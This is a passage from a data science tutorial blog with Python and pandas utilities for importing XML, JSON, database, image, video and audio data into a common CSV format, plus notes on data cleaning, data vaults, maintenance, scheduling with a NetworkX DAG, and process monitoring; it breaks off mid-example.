sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-XML-Country.csv'
OutputData.to_csv(sOutputFileName, index=False)
print('XML to HORUS - Done')
# Utility done ===============================================
### JSON to HORUS
These utilities enable your solution to import JSON-based data from your raw data sources. I will demonstrate this utility in blog 7, with sample data.
Example: This utility imports a list of countries in JSON file format into HORUS format.

# Utility Start JSON to HORUS ================================
# Standard Tools
#=============================================================
import pandas as pd
# Input Agreement ============================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/Country_Code.json'
InputData=pd.read_json(sInputFileName, orient='index', encoding="latin-1")
print('Input Data Values ===================================')
print(InputData)
print('=====================================================')
# Processing Rules ===========================================
ProcessData=InputData
# Remove columns ISO-2-Code and ISO-3-CODE
ProcessData.drop('ISO-2-CODE', axis=1,inplace=True)
ProcessData.drop('ISO-3-Code', axis=1,inplace=True)
# Rename Country and ISO-M49
ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True)
ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True)
# Set new Index
ProcessData.set_index('CountryNumber', inplace=True)
# Sort data by CountryName
ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True)
print('Process Data Values =================================')
print(ProcessData)
print('=====================================================')
# Output Agreement ===========================================
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-JSON-Country.csv'
OutputData.to_csv(sOutputFileName, index = False)
print('JSON to HORUS - Done')
# Utility done ===============================================

### Database to HORUS

These utilities enable your solution to import data from existing database sources.

Example: This utility imports a list of countries in SQLite data format into HORUS format.

# Utility Start Database to HORUS ============================
# Standard Tools
#=============================================================
import pandas as pd
import sqlite3 as sq
# Input Agreement ============================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/utility.db'
sInputTable='Country_Code'
conn = sq.connect(sInputFileName)
sSQL='select * FROM ' + sInputTable + ';'
InputData=pd.read_sql_query(sSQL, conn)
print('Input Data Values ===================================')
print(InputData)
print('=====================================================')
# Processing Rules ===========================================
ProcessData=InputData
# Remove columns ISO-2-Code and ISO-3-CODE
ProcessData.drop('ISO-2-CODE', axis=1,inplace=True)
ProcessData.drop('ISO-3-Code', axis=1,inplace=True)
# Rename Country and ISO-M49
ProcessData.rename(columns={'Country': 'CountryName'}, inplace=True)
ProcessData.rename(columns={'ISO-M49': 'CountryNumber'}, inplace=True)
# Set new Index
ProcessData.set_index('CountryNumber', inplace=True)
# Sort data by CountryName
ProcessData.sort_values('CountryName', axis=0, ascending=False, inplace=True)
print('Process Data Values =================================')
print(ProcessData)
print('=====================================================')
# Output Agreement ===========================================
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-CSV-Country.csv'
OutputData.to_csv(sOutputFileName, index = False)
print('Database to HORUS - Done')
# Utility done ===============================================

There are also additional expert utilities that you may want.

### Picture to HORUS

These expert utilities enable your solution to convert a picture into extra data. These utilities identify objects in the picture, such as people, types of objects, locations, and many more complex data features.

Example: This utility imports a picture of a dog called Angus in JPG format into HORUS format.
# Utility Start Picture to HORUS =============================
# Standard Tools
#=============================================================
from scipy.misc import imread
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
# Input Agreement ============================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/Angus.jpg'
InputData = imread(sInputFileName, flatten=False, mode='RGBA')
print('Input Data Values ===================================')
print('X: ',InputData.shape[0])
print('Y: ',InputData.shape[1])
print('RGBA: ', InputData.shape[2])
print('=====================================================')
# Processing Rules ===========================================
ProcessRawData=InputData.flatten()
y=InputData.shape[2] + 2
x=int(ProcessRawData.shape[0]/y)
ProcessData=pd.DataFrame(np.reshape(ProcessRawData, (x, y)))
sColumns= ['XAxis','YAxis','Red','Green','Blue','Alpha']
ProcessData.columns=sColumns
ProcessData.index.names=['ID']
print('Rows: ',ProcessData.shape[0])
print('Columns :',ProcessData.shape[1])
print('Process Data Values =================================')
plt.imshow(InputData)
plt.show()
print('=====================================================')
# Output Agreement ===========================================
OutputData=ProcessData
print('Storing File')
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Picture.csv'
OutputData.to_csv(sOutputFileName, index = False)
print('Picture to HORUS - Done')
# Utility done ===============================================

### Video to HORUS

These expert utilities enable your solution to convert a video into extra data. These utilities identify objects in the video frames, such as people, types of objects, locations, and many more complex data features.

Example: This utility imports a movie in MP4 format into HORUS format. The process is performed in two stages.

#### Movie to Frames

# Utility Start Movie to HORUS (Part 1) ======================
# Standard Tools
#=============================================================
import os
import shutil
import cv2
#=============================================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/dog.mp4'
sDataBaseDir='C:/VKHCG/05-DS/9999-Data/temp'
if os.path.exists(sDataBaseDir):
    shutil.rmtree(sDataBaseDir)
if not os.path.exists(sDataBaseDir):
    os.makedirs(sDataBaseDir)
print('=====================================================')
print('Start Movie to Frames')
print('=====================================================')
vidcap = cv2.VideoCapture(sInputFileName)
success,image = vidcap.read()
count = 0
while success:
    sFrame=sDataBaseDir + str('/dog-frame-' + str(format(count, '04d')) + '.jpg')
    print('Extracted: ', sFrame)
    cv2.imwrite(sFrame, image)
    if os.path.getsize(sFrame) == 0:
        count += -1
        os.remove(sFrame)
        print('Removed: ', sFrame)
    if cv2.waitKey(10) == 27:  # exit if Escape is hit
        break
    count += 1
    # Read the next frame
    success,image = vidcap.read()
print('=====================================================')
print('Generated : ', count, ' Frames')
print('=====================================================')
print('Movie to Frames HORUS - Done')
print('=====================================================')
# Utility done ===============================================

I have now created frames and need to load them into HORUS.
#### Frames to HORUS

# Utility Start Movie to HORUS (Part 2) ======================
# Standard Tools
#=============================================================
from scipy.misc import imread
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import os
# Input Agreement ============================================
sDataBaseDir='C:/VKHCG/05-DS/9999-Data/temp'
f=0
for file in os.listdir(sDataBaseDir):
    if file.endswith(".jpg"):
        f += 1
        sInputFileName=os.path.join(sDataBaseDir, file)
        print('Process : ', sInputFileName)
        InputData = imread(sInputFileName, flatten=False, mode='RGBA')
        print('Input Data Values ===================================')
        print('X: ',InputData.shape[0])
        print('Y: ',InputData.shape[1])
        print('RGBA: ', InputData.shape[2])
        print('=====================================================')
        # Processing Rules ====================================
        ProcessRawData=InputData.flatten()
        y=InputData.shape[2] + 2
        x=int(ProcessRawData.shape[0]/y)
        ProcessFrameData=pd.DataFrame(np.reshape(ProcessRawData, (x, y)))
        ProcessFrameData['Frame']=file
        print('Process Data Values =================================')
        plt.imshow(InputData)
        plt.show()
        if f == 1:
            ProcessData=ProcessFrameData
        else:
            ProcessData=ProcessData.append(ProcessFrameData)
if f > 0:
    sColumns= ['XAxis','YAxis','Red','Green','Blue','Alpha','FrameName']
    ProcessData.columns=sColumns
    ProcessData.index.names=['ID']
    print('Rows: ',ProcessData.shape[0])
    print('Columns :',ProcessData.shape[1])
    print('=====================================================')
    # Output Agreement ========================================
    OutputData=ProcessData
    print('Storing File')
    sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Movie-Frame.csv'
    OutputData.to_csv(sOutputFileName, index = False)
    print('Processed : ', f, ' frames')
print('=====================================================')
print('Movie to HORUS - Done')
print('=====================================================')
# Utility done ===============================================

### Audio to HORUS

These expert utilities enable your solution to convert audio into extra data. These utilities identify features in the audio, such as speakers, speech, and many more complex data features.

Example: This utility imports a set of audio files in WAV format into HORUS format.

# Utility Start Audio to HORUS ===============================
# Standard Tools
#=============================================================
from scipy.io import wavfile
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
#=============================================================
def show_info(aname, a, r):
    print('----------------')
    print("Audio:", aname)
    print("Rate:", r)
    print("shape:", a.shape)
    print("dtype:", a.dtype)
    print("min, max:", a.min(), a.max())
    print('----------------')
    plot_info(aname, a, r)
#=============================================================
def plot_info(aname, a, r):
    sTitle= 'Signal Wave - '+ aname + ' at ' + str(r) + 'hz'
    plt.title(sTitle)
    sLegend=[]
    for c in range(a.shape[1]):
        sLabel = 'Ch' + str(c+1)
        sLegend=sLegend+[sLabel]
        plt.plot(a[:,c], label=sLabel)
    plt.legend(sLegend)
    plt.show()
#=============================================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/2ch-sound.wav'
print('=====================================================')
print('Processing : ', sInputFileName)
print('=====================================================')
InputRate, InputData = wavfile.read(sInputFileName)
show_info("2 channel", InputData, InputRate)
ProcessData=pd.DataFrame(InputData)
sColumns= ['Ch1','Ch2']
ProcessData.columns=sColumns
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-2ch.csv'
OutputData.to_csv(sOutputFileName, index = False)
#=============================================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/4ch-sound.wav'
print('=====================================================')
print('Processing : ', sInputFileName)
print('=====================================================')
InputRate, InputData = wavfile.read(sInputFileName)
show_info("4 channel", InputData, InputRate)
ProcessData=pd.DataFrame(InputData)
sColumns= ['Ch1','Ch2','Ch3','Ch4']
ProcessData.columns=sColumns
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-4ch.csv'
OutputData.to_csv(sOutputFileName, index = False)
#=============================================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/6ch-sound.wav'
print('=====================================================')
print('Processing : ', sInputFileName)
print('=====================================================')
InputRate, InputData = wavfile.read(sInputFileName)
show_info("6 channel", InputData, InputRate)
ProcessData=pd.DataFrame(InputData)
sColumns= ['Ch1','Ch2','Ch3','Ch4','Ch5','Ch6']
ProcessData.columns=sColumns
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-6ch.csv'
OutputData.to_csv(sOutputFileName, index = False)
#=============================================================
sInputFileName='C:/VKHCG/05-DS/9999-Data/8ch-sound.wav'
print('=====================================================')
print('Processing : ', sInputFileName)
print('=====================================================')
InputRate, InputData = wavfile.read(sInputFileName)
show_info("8 channel", InputData, InputRate)
ProcessData=pd.DataFrame(InputData)
sColumns= ['Ch1','Ch2','Ch3','Ch4','Ch5','Ch6','Ch7','Ch8']
ProcessData.columns=sColumns
OutputData=ProcessData
sOutputFileName='C:/VKHCG/05-DS/9999-Data/HORUS-Audio-8ch.csv'
OutputData.to_csv(sOutputFileName, index = False)
print('=====================================================')
print('Audio to HORUS - Done')
print('=====================================================')
# Utility done ===============================================

### Data Stream to HORUS

These expert utilities enable your solution to handle data streams. Data streams are evolving as the fastest-growing data-collecting interface at the edge of the data lake. I will offer extended discussions and advice later in the blog on the use of data streaming in the data science ecosystem.
Tip I use the confluent-kafka Python package for my Kafka streaming requirements. I have also used PyKafka with success.

In the Retrieve super step of the functional layer, I dedicate more text to clarifying how to use and generate full processing chains to retrieve data from your data lake, using optimum techniques.

### Assess Utilities

Utilities for this super step contain all the processing chains for quality assurance and additional data enhancements. The assess utilities ensure that the data imported via the Retrieve super step is of good quality and conforms to the prerequisite standards of your solution. I perform feature engineering at this level, to improve the data for better processing success in the later stages of data processing. There are two types of assess utilities.

#### Feature Engineering

Feature engineering is the process by which you enhance or extract data sources, to enable better extraction of the characteristics you are investigating in the data sets. Following is a small subset of the utilities you may use.

#### Fixers Utilities

Fixers enable your solution to take your existing data and fix a specific quality issue. Examples include:

Removing leading or lagging spaces from a data entry. The example in Python:

baddata = " Data Science with too many spaces is bad!!! "
print('>',baddata,'<')
cleandata=baddata.strip()
print('>',cleandata,'<')

Removing nonprintable characters from a data entry. The example in Python:

import string
printable = set(string.printable)
baddata = "Data\x00Science with\x02 funny characters is \x10bad!!!"
cleandata=''.join(filter(lambda x: x in printable, baddata))
print(cleandata)

Reformatting a data entry to match specific formatting criteria, e.g., converting 2017/01/31 to 31 January 2017. The example in Python:

import datetime as dt
baddate = dt.date(2017, 1, 31)
baddata=format(baddate,'%Y-%m-%d')
print(baddata)
gooddate = dt.datetime.strptime(baddata,'%Y-%m-%d')
gooddata=format(gooddate,'%d %B %Y')
print(gooddata)

#### Adders Utilities

Adders use existing data entries and then add additional data entries to enhance your data. Examples include:

Utilities that look up extra data against existing data entries in your solution. A utility can use the United Nations' ISO M49 standard for the countries list, to look up 826 and set the country name to United Kingdom. Another utility uses an ISO alpha-2 lookup on GB to return the country name United Kingdom.

Zoning utilities that add extra data entries based on a test. A utility can indicate that a data entry is valid, i.e., you found the code in the lookup. Another utility can indicate whether your data entry for a bank balance is in the black or the red.

### Process Utilities

Utilities for this super step contain all the processing chains for building the data vault. I will discuss the data vault's (Time, Person, Object, Location, Event) design, model, and inner workings in detail during the Process super step of the functional layer. For the purposes of this blog, I will at this point introduce the data vault as a data structure that uses a well-structured design to store data with full history. The basic elements of the data vault are hubs, satellites, and links. There are three basic process utilities.

#### Data Vault Utilities

The data vault is a highly specialist data storage technique that was designed by Dan Linstedt. The data vault is a detail-oriented, historical-tracking, and uniquely linked set of normalized tables that support one or more functional areas of business.
It is a hybrid approach, encompassing the best of breed between third normal form (3NF) and star schema.

#### Hub Utilities

Hub utilities ensure that the integrity of the data vault's (Time, Person, Object, Location, Event) hubs is 100% correct, to verify that the vault is working as designed.

#### Satellite Utilities

Satellite utilities ensure the integrity of each specific satellite and its associated hub.

#### Link Utilities

Link utilities ensure the integrity of each specific link and its associated hubs.

As the data vault is a highly structured data model, the utilities in the Process super step of the functional layer will assist you in building your own solution.

### Transform Utilities

Utilities for this super step contain all the processing chains for building the data warehouse from the results of your practical data science. In the Transform super step, the system builds dimensions and facts to prepare a data warehouse, via a structured data configuration, for the algorithms of data science to use to produce data science discoveries. There are two basic transform utilities.

#### Dimensions Utilities

The dimensions use several utilities to ensure the integrity of the dimension structure. Concepts such as conformed dimensions, degenerate dimensions, role-playing dimensions, mini-dimensions, outrigger dimensions, slowly changing dimensions, late-arriving dimensions, and dimension types (0, 1, 2, 3) all require specific utilities to ensure 100% integrity of the dimension structure. Pure data science algorithms are the most used at this point in your solution. I will discuss extensively which data science algorithms are required to perform practical data science. I will ratify that the most advanced of these are standard algorithms, which will result in common utilities.

#### Facts Utilities

These consist of a number of utilities that ensure the integrity of the dimension structure and the facts. There are various statistical and data science algorithms that can be applied to the facts that will result in additional utilities.

Note The most important utilities for your data science will be the transform utilities, as they hold the accredited data science you need for your solution to be successful.

### Data Science Utilities

There are several data science-specific utilities that are required for you to achieve success in the data processing ecosystem.

### Data Binning or Bucketing

Binning is a data preprocessing technique used to reduce the effects of minor observation errors. Statistical data binning is a way to group a number of more or less continuous values into a smaller number of "bins."

Example: Open your Python editor and create a file called DU-Histogram.py in the directory C:\VKHCG\05-DS\4000-UL\0200-DU. Now copy this code into the file, as follows:

import numpy as np
import matplotlib.pyplot as plt
np.random.seed(0)
# example data
mu = 90  # mean of distribution
sigma = 25  # standard deviation of distribution
x = mu + sigma * np.random.randn(5000)
num_bins = 25
fig, ax = plt.subplots()
# the histogram of the data
n, bins, patches = ax.hist(x, num_bins, density=True)
# add a 'best fit' line (the normal probability density function)
y = (1 / (np.sqrt(2 * np.pi) * sigma)) * np.exp(-0.5 * ((bins - mu) / sigma) ** 2)
ax.plot(bins, y, '--')
ax.set_xlabel('Example Data')
ax.set_ylabel('Probability density')
sTitle=r'Histogram ' + str(len(x)) + ' entries into ' + str(num_bins) + r' Bins: $\mu=' + str(mu) + r'$, $\sigma=' + str(sigma) + r'$'
ax.set_title(sTitle)
fig.tight_layout()
plt.show()
The binning reduces the 5,000 data entries to only 25 bins, with close-to-reality values.
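If you want the bin assignments themselves, rather than only the plot, here is a minimal sketch using pandas on the same synthetic data as above; the variable names are illustrative only.

import numpy as np
import pandas as pd
np.random.seed(0)
x = 90 + 25 * np.random.randn(5000)
# Assign each of the 5000 values to one of 25 equal-width bins
binned = pd.cut(x, bins=25)
# The per-bin counts carry the same information the histogram plots
print(pd.Series(binned).value_counts().sort_index())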
### Averaging of Data
Averaging feature values enables you to reduce data volumes in a controlled fashion and improves the effectiveness of downstream data processing.
Example: Open your Python editor and create a file called DU-Mean.py in the directory C:\VKHCG\05-DS\4000-UL\0200-DU. The following code reduces the data volume from 3,562 to 3 data entries, which is a 99.91% reduction.
import pandas as pd
InputFileName='IP_DATA_CORE.csv'
OutputFileName='Retrieve_Router_Location.csv'
Base='C:/VKHCG'
sFileName=Base + '/01-Vermeulen/00-RawData/' + InputFileName
IP_DATA_ALL=pd.read_csv(sFileName, usecols=['Country','Place Name','Latitude','Longitude'], encoding="latin-1")
IP_DATA_ALL.rename(columns={'Place Name': 'Place_Name'}, inplace=True)
AllData=IP_DATA_ALL[['Country', 'Place_Name','Latitude']]
print(AllData)
MeanData=AllData.groupby(['Country', 'Place_Name'])['Latitude'].mean()
print(MeanData)
This technique also enables the data scientist to prevent a common issue called overfitting the model.
### Outlier Detection
Outliers are data points so different from the rest of the data in the data set that they may be caused by an error in the data source. There is a technique called outlier detection that, with good data science, will identify these outliers.
Example: Open your Python editor and create a file called DU-Outliers.py in the directory C:\VKHCG\05-DS\4000-UL\0200-DU.
import pandas as pd
InputFileName='IP_DATA_CORE.csv'
OutputFileName='Retrieve_Router_Location.csv'
Base='C:/VKHCG'
sFileName=Base + '/01-Vermeulen/00-RawData/' + InputFileName
IP_DATA_ALL=pd.read_csv(sFileName, usecols=['Country','Place Name','Latitude','Longitude'], encoding="latin-1")
IP_DATA_ALL.rename(columns={'Place Name': 'Place_Name'}, inplace=True)
LondonData=IP_DATA_ALL.loc[IP_DATA_ALL['Place_Name']=='London']
AllData=LondonData[['Country', 'Place_Name','Latitude']]
print('All Data')
print(AllData)
MeanData=AllData.groupby(['Country', 'Place_Name'])['Latitude'].mean()
StdData=AllData.groupby(['Country', 'Place_Name'])['Latitude'].std()
print('Outliers')
UpperBound=float(MeanData+StdData)
print('Higher than ', UpperBound)
OutliersHigher=AllData[AllData.Latitude>UpperBound]
print(OutliersHigher)
LowerBound=float(MeanData-StdData)
print('Lower than ', LowerBound)
OutliersLower=AllData[AllData.Latitude<LowerBound]
print(OutliersLower)
print('Not Outliers')
OutliersNot=AllData[(AllData.Latitude>=LowerBound) & (AllData.Latitude<=UpperBound)]
print(OutliersNot)
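The same one-standard-deviation test can also be expressed as a z-score, which generalizes to any numeric column. A minimal sketch, with a small hypothetical latitude sample of my own; it is an alternative formulation, not the utility above.

import pandas as pd
# Hypothetical latitude readings; any numeric column works the same way
AllData = pd.DataFrame({'Latitude': [51.50, 51.51, 51.52, 51.49, 53.80]})
Mean = AllData['Latitude'].mean()
Std = AllData['Latitude'].std()
# |z| > 1 reproduces the mean plus/minus one-standard-deviation bounds above
AllData['zLatitude'] = (AllData['Latitude'] - Mean) / Std
print(AllData[AllData['zLatitude'].abs() > 1])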
### Organize Utilities
Utilities for this super step contain all the processing chains for building the data marts. The organize utilities are mostly used to create data marts against the data science results stored in the data warehouse dimensions and facts.
### Report Utilities
Utilities for this super step contain all the processing chains for building the visualization and reporting of the actionable knowledge. The report utilities are mostly used to create data visualizations against the data science results stored in the data marts.
### Maintenance Utilities
The data science solutions you are building are a standard data system and, consequently, require maintenance utilities, as with any other system. Data engineers and data scientists must work together to ensure that the ecosystem works at its most efficient level at all times.
Utilities cover several areas.
#### Backup and Restore Utilities
These perform different types of database backups and restores for the solution. They are standard for any computer system. For the specific utilities, I suggest you have an in-depth discussion with your own systems manager or the systems manager of your client.
I normally provide a wrapper for the specific utility that I can call in my data science ecosystem, without direct exposure to the custom requirements at each customer.
#### Check Data Integrity Utilities
These utilities check the allocation and structural integrity of database objects and indexes across the ecosystem, to ensure the accurate processing of the data into knowledge.
#### History Cleanup Utilities
These utilities archive and remove entries in the history tables in the databases.
Note The "right-to-be-forgotten" statutes in various countries around the world impose multifaceted requirements on this area of data science, as you must be able to implement selective data processing.
Warning I suggest you study your information-protection laws in detail, because data processing via data science is becoming highly exposed, and in a lot of countries, fines are imposed if you get these processing rules wrong.
#### Maintenance Cleanup Utilities
These utilities remove artifacts related to maintenance plans and database backup files.
#### Notify Operator Utilities
Utilities that send notification messages to the operations team about the status of the system are crucial to any data science factory.
#### Rebuild Data Structure Utilities
These utilities rebuild database tables and views to ensure that all the development is as designed. In blogs 6–11, I will discuss the specific rebuild utilities.
#### Reorganize Indexing Utilities
These utilities reorganize indexes in database tables and views, which is a major operational process when your data lake grows at a massive volume and velocity. The variety of data types also complicates the application of indexes to complex data structures.
As a data scientist, you must understand when and how your data sources will change. An unclear indexing strategy can slow down algorithms without your noticing, and you can lose data by failing to handle the velocity of the data flow.
#### Shrink/Move Data Structure Utilities
These reduce the footprint size of your database data and associated log artifacts, to ensure an optimum solution is executing.
#### Solution Statistics Utilities
These utilities update information about the data science artifacts, to ensure that your data science structures are recorded. Call it data science on your data science.
The preceding list is comprehensive but not all-inclusive. I suggest that you speak to your development and operations staff, to ensure that your data science solution fits into the overall data processing structures of your organization.
### Processing Utilities
The data science solutions you are building require processing utilities to perform standard system processing. The data science environment requires two basic processing utility types.
#### Scheduling Utilities
The scheduling utilities I use are based on the basic agile scheduling principles.
#### Backlog Utilities
Backlog utilities accept new processing requests into the system and are ready to be processed in future processing cycles.
#### To-Do Utilities
The to-do utilities take a subset of backlog requests for processing during the next processing cycle. They use classification labels, such as priority and parent-child relationships, to decide what process runs during the next cycle.
#### Doing Utilities
The doing utilities execute the current cycle’s requests.
#### Done Utilities
The done utilities confirm that the completed requests performed the expected processing.
#### Monitoring Utilities
The monitoring utilities ensure that the complete system is working as expected.
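To make the scheduling cycle concrete, here is a minimal sketch of the four scheduling states; the queue contents and the run_request helper are my own illustration, not utilities from this blog.

from collections import deque

# Illustrative processing-request queues for the agile cycle
backlog = deque(['Retrieve-CSV', 'Assess-Fix', 'Process-Vault'])
todo, doing, done = deque(), deque(), deque()

def run_request(request):
    # Stand-in for the real processing; assume it always succeeds here
    print('Processing:', request)
    return True

# Backlog -> To-Do: take a subset (here, two requests) for the next cycle
for _ in range(min(2, len(backlog))):
    todo.append(backlog.popleft())

# To-Do -> Doing -> Done: execute the current cycle's requests
while todo:
    request = todo.popleft()
    doing.append(request)
    if run_request(request):
        doing.remove(request)
        done.append(request)

print('Done this cycle:', list(done), ' Still in backlog:', list(backlog))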
#### Engineering a Practical Utility Layer
The utility layer holds all the utilities you share across the data science environment. I suggest that you create three sublayers to help the utility layer support the better future use of the utilities.
### Maintenance Utility
Collect all the maintenance utilities in this single directory, to enable the environment to handle the utilities as a collection.
I suggest that you keep a maintenance utility registry, to enable your entire team to use the common utilities. Include enough documentation for each maintenance utility, to explain its complete workings and requirements.
### Data Utility
Collect all the data utilities in this single directory, to enable the environment to handle the utilities as a collection. I suggest that you keep a data utility registry to enable your entire team to use the common utilities. Include enough documentation for each data utility to explain its complete workings and requirements.
### Processing Utility
Collect all the processing utilities in this single directory to enable the environment to handle the utilities as a collection.
I suggest that you keep a processing utility registry, to enable your entire team to use the common utilities. Include sufficient documentation for each processing utility to explain its complete workings and requirements.
Warning Ensure that you support your company’s processing environment and that the suggested environment supports an agile processing methodology. This may not always match your own environment.
Caution Remember: these utilities are used by your wider team; if you interrupt them, you will pause other currently running processing. Take extra care with this layer's artifacts.
#### Three Management Layers
This blog is about the three management layers that are must-haves for any large-scale data science system. I will discuss them at a basic level and suggest you scale out these management capabilities as your environment grows.
#### Operational Management Layer
The operational management layer is the core store for the data science ecosystem’s complete processing capability. The layer stores every processing schedule and workflow for the all-inclusive ecosystem.
This area enables you to see a singular view of the entire ecosystem and reports the status of its processing. The operational management layer is where I record the following.
### Processing-Stream Definition and Management
The processing-stream definitions are the building block of the data science ecosystem. I store all my current active processing scripts in this section.
Definition management describes the workflow of the scripts through the system, ensuring that the correct execution order is managed, as per the data scientists’ workflow design.
Tip Keep all your general techniques and algorithms in a source-control-based system, such as GitHub or SVN, in the format of importable libraries. That way, you do not have to verify if they work correctly every time you use them.
Advice I spend 10% of my time every week generating new processing building blocks and 10% improving existing building blocks.
I can confirm that this action easily saves more than 20% of my time on processing new data science projects when I start them, as I already have a base set of tested code to support the activities required. So, please invest in your own and your team’s future, by making this a standard practice for the team. You will not regret the investment.
Warning When you replace existing building blocks, check for impacts downstream. I suggest you use a simple versioning scheme of mylib_001_01. That way, you can have 999 versions with 99 sub-versions.
This also ensures that your new version can be rolled out into your customer base in an orderly manner. The most successful approach is to support the process with a good version-control system that can handle multiple branched or forked code sets.
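As a minimal sketch of how such a version label can be parsed and compared, the parse_version helper and its regular expression are my own illustration:

import re

def parse_version(library_name):
    # mylib_001_01 -> ('mylib', 1, 1): name, version (001-999), sub-version (01-99)
    match = re.match(r'^(.+)_(\d{3})_(\d{2})$', library_name)
    if match is None:
        raise ValueError('Not a valid versioned library name: ' + library_name)
    name, version, sub = match.groups()
    return name, int(version), int(sub)

print(parse_version('mylib_001_01'))   # ('mylib', 1, 1)
print(parse_version('mylib_002_13') > parse_version('mylib_002_09'))  # True, tuples compare in order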
### Parameters
The parameters for the processing are stored in this section, to ensure a single location for all the system parameters. You will see in all the following examples that there is an ecosystem setup phase.
import sys
import os

if sys.platform == 'linux':
    Base=os.path.expanduser('~') + '/VKHCG'
else:
    Base='C:/VKHCG'
print('################################')
print('Working Base :',Base, ' using ', sys.platform)
print('################################')
sFileDir=Base + '/01-Vermeulen/01-Retrieve/01-EDS/02-Python'
if not os.path.exists(sFileDir):
    os.makedirs(sFileDir)
sFileName=Base + '/01-Vermeulen/00-RawData/Country_Currency.xlsx'
In my production system, for each customer, we place all these parameters in a single location and then simply call the single location. Two main designs are used:
1. A simple text file that we then import into every Python script
2. A parameter database supported by a standard parameter setup script that we then include in every script
I will also admit to having several parameters that follow the same format as the preceding examples, and I simply collect them in a section at the top of the code.
Advice Find a way that works best for your team and standardize that method across your team.
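As a minimal sketch of the first design, a shared parameter file imported by every script, where the file name parameters.py and its contents are illustrative assumptions:

# parameters.py - single shared location for ecosystem parameters
import sys
import os

if sys.platform == 'linux':
    Base = os.path.expanduser('~') + '/VKHCG'
else:
    Base = 'C:/VKHCG'

Company = '01-Vermeulen'
RawData = Base + '/' + Company + '/00-RawData'

Every script then starts with from parameters import Base, RawData, so a path change is made in exactly one place.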
### Scheduling
The scheduling plan is stored in this section, to enable central control and visibility of the complete scheduling plan for the system. In my solution, I use a Drum-Buffer-Rope methodology. The principle is simple.
Similar to a troop of people marching, the Drum-Buffer-Rope methodology is a standard practice for identifying the slowest process and then using it to pace the complete pipeline. You then tie the rest of the pipeline to this process to control the ecosystem's speed.
So, you place the "drum" at the slow part of the pipeline, to set the processing pace, and attach the "rope" from the beginning of the pipeline to the end, ensuring that no processing is done that is not attached to this drum. This ensures that your processes complete more efficiently, as nothing enters or leaves the process pipe without being recorded by the drum's beat.
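As a minimal sketch of the drum idea, with invented step names and throughput numbers, the slowest step sets the pace for the whole pipeline:

# Records per minute each pipeline step can sustain (illustrative numbers)
throughput = {
    'Retrieve': 1200,
    'Assess': 800,
    'Process': 350,   # slowest step
    'Transform': 900,
    'Report': 1500,
}

# The drum is the slowest step; its rate is the pace of the whole pipeline
drum = min(throughput, key=throughput.get)
print('Drum:', drum, '- release work at', throughput[drum], 'records per minute')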
I normally use an independent Python program that employs a directed acyclic graph (DAG), built with the NetworkX library's DiGraph structure.
This automatically resolves duplicate dependencies and enables the use of a topological sort, which ensures that tasks are completed in the order of requirement. Following is an example: Open this in your Python editor and view the process.
import networkx as nx
Here you construct your network in any order.
DG = nx.DiGraph([
('Start','Retrieve1'),
('Start','Retrieve2'),
('Retrieve1','Assess1'),
('Retrieve2','Assess2'),
('Assess1','Process'),
('Assess2','Process'),
('Process','Transform'),
('Transform','Report1'),
('Transform','Report2')
])
print("Unsorted Nodes")
print(DG.nodes())
You can test your network for valid DAG.
print("Is a DAG?",nx.is_directed_acyclic_graph(DG))
Now you sort the DAG into a correct order.
sOrder=list(nx.topological_sort(DG))
print("Sorted Nodes")
print(sOrder)
You can also visualize your network.
import matplotlib.pyplot as plt
pos=nx.spring_layout(DG)
nx.draw_networkx_nodes(DG,pos=pos,node_size = 1000)
nx.draw_networkx_edges(DG,pos=pos)
nx.draw_networkx_labels(DG,pos=pos)
plt.show()
You can add some extra nodes and see how this resolves the ordering. I suggest that you experiment with networks of different configurations, as this will enable you to understand how the process truly assists with the processing workload.
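For example, continuing from the DG built above, you can add a hypothetical Archive step downstream of both reports and re-sort; the Archive node is my own illustrative addition:

# Add a hypothetical extra step downstream of both reports
DG.add_edge('Report1','Archive')
DG.add_edge('Report2','Archive')
print("Is still a DAG?", nx.is_directed_acyclic_graph(DG))
print(list(nx.topological_sort(DG)))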
Tip I normally store the requirements for the nodes in a common database. That way, I can upload the requirements for multiple data science projects and resolve the optimum requirement with ease.
### Monitoring
The central monitoring process is in this section to ensure that there is a single view of the complete system. Always ensure that you monitor your data science from a single point. Having various data science processes running on the same ecosystem without central monitoring is not advised.
Tip I always get my data science to simply set an active status in a central table when it starts and a not-active when it completes. That way, the entire team knows who is running what and can plan its own processing better.
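A minimal sketch of that status pattern, assuming a shared SQLite file; the database path, table name, and column names are my own illustration:

import sqlite3 as sq
import datetime

def set_status(job, status):
    # Record who is running what in one central table
    conn = sq.connect('C:/VKHCG/77-Yoke/99-SQLite/Monitor.db')
    conn.execute('CREATE TABLE IF NOT EXISTS JobStatus ('
                 'JobName TEXT PRIMARY KEY, Status TEXT, StatusTime TEXT)')
    conn.execute('INSERT OR REPLACE INTO JobStatus VALUES (?,?,?)',
                 (job, status, datetime.datetime.now().isoformat()))
    conn.commit()
    conn.close()

set_status('Retrieve-Country', 'active')      # at the start of the job
# ... data science processing happens here ...
set_status('Retrieve-Country', 'not-active')  # when the job completes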
If you are running on Windows, try the following:
conda install -c primer wmi
import wmi
c = wmi.WMI ()
for process in c.Win32_Process ():
print(process.ProcessId, process.Name)
For Linux, try this:
import os
pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
for pid in pids:
    try:
